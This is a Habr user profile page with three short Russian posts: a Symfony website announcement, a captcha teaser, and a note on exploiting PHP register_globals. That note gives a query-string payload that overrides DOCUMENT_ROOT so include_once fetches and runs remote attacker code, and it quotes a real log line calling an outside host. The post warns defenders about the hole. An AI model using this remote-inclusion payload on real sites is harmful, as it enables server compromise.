Pull to refresh
13
0
medvoodoo @medvoodoo

User

Send message

Открылся новый официальный сайт symfony

Reading time 1 min
Views 1K
symfony.com
Хотя он еще не до конца доделан, но систематизация информации на нем, как и дизайн, намного лучше, чем на предыдущем сайте. Так же обратите внимание на выпадающий список SensioLabs Network в верхнем левом углу, где в одном месте собраны ссылки на их основные сайты, теперь на сайт доктрины или свифта можно перейти намного проще.

P.S. Наконец дождались, официальный релиз симфонии 2 обещают завтра http://symfony.com/download
Total votes 43: ↑35 and ↓8 +27
Comments 27

взлом с помощью register_globals

Reading time 1 min
Views 933
Недавно познакомился с относительно новой идеей хака для включенных register_globals:
если в коде есть include_once($_SERVER['DOCUMENT_ROOT']."file.php")то
нам достаточно передать строчку вида: "/?_SERVER[DOCUMENT_ROOT]=http://hacksite/hackcode.txt?" чтобы произошла подстановка и выполнение нашего скрипта на сайте потребителя.

41.210.32.69 - - [15/Feb/2009:16:32:00 +0300] "POST /?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt? HTTP/1.0" 200 22054 "http://www.mysite.ru//?_SERVER[DOCUMENT_ROOT]=http://fakomaster.freehostia.com/bad.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6"

Мораль сей басни стара: будьте внимательны и не позволяйте формировать любой запрос через передаваемые параметры.
UPD: Уточняю, уже существует бот на скан подобной уязвимости, и данный лог — реальный, изменен только сайт, с которого этот лог взят, так что это не просто теоретическая уязвимость.
Total votes 44: ↑21 and ↓23 -2
Comments 25

Еще раз о капчах

Reading time 2 min
Views 682
Сейчас на хабре стала очень популярной тема защиты форм от ботов. У меня сложилось впечатление, что большинство писателей не до конца представляют себе эту задачу. Здесь я попытаюсь дать краткий обзор проблем встающих перед разработчиками и некоторые варианты их решения.
Читать дальше →
Total votes 10: ↑5 and ↓5 0
Comments 32

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Date of birth
Registered
Activity